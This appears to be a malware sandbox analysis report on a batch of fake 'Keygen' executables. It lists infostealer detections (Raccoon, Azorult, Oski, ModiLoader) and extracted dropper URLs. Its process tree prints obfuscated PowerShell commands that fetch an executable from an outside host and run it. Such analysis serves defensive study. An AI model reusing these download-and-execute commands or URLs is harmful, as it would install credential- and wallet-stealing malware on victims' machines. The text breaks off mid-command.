Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

8

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

8

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    67s
  • max time network
    156s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (21).exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 05:50:22 GMT Bot_ID: 18823CA4-5761-4226-8787-CF36135F1C68_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: LZUKLIOU - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (971 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 05:50:27 GMT Bot_ID: 18823CA4-5761-4226-8787-CF36135F1C68_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: LZUKLIOU - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (945 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 4 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 2 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 2 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (21).exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (21).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3044
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7DE0.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (21).exe""
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1376
      • C:\Users\Admin\AppData\Local\Temp\7DE0.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1932
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7DE0.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2352
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3116
          • C:\Users\Public\uej.exe
            "C:\Users\Public\uej.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:5036
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:4360
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:4632
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 4632 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\643520994273809\\* & exit
                  8⤵
                    PID:3112
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 4632
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2264
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:4308
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4796
              • C:\Users\Public\uej.exe
                "C:\Users\Public\uej.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                PID:4556
                • C:\Users\Admin\AppData\Local\Temp\Ch451O06zy.exe
                  "C:\Users\Admin\AppData\Local\Temp\Ch451O06zy.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:3728
                • C:\Users\Admin\AppData\Local\Temp\pliHZ6Y5oE.exe
                  "C:\Users\Admin\AppData\Local\Temp\pliHZ6Y5oE.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4220
                • C:\Users\Admin\AppData\Local\Temp\lk0qQlTSlg.exe
                  "C:\Users\Admin\AppData\Local\Temp\lk0qQlTSlg.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4524
                • C:\Users\Admin\AppData\Local\Temp\9U5cGXWruS.exe
                  "C:\Users\Admin\AppData\Local\Temp\9U5cGXWruS.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:188
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\uej.exe"
                  7⤵
                    PID:2276
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /T 10 /NOBREAK
                      8⤵
                      • Delays execution with timeout.exe
                      PID:4844
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7DE0.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2424
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:784
          • C:\Windows\SysWOW64\timeout.exe
            timeout 1
            3⤵
            • Delays execution with timeout.exe
            PID:2808
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7DE0.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3780
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 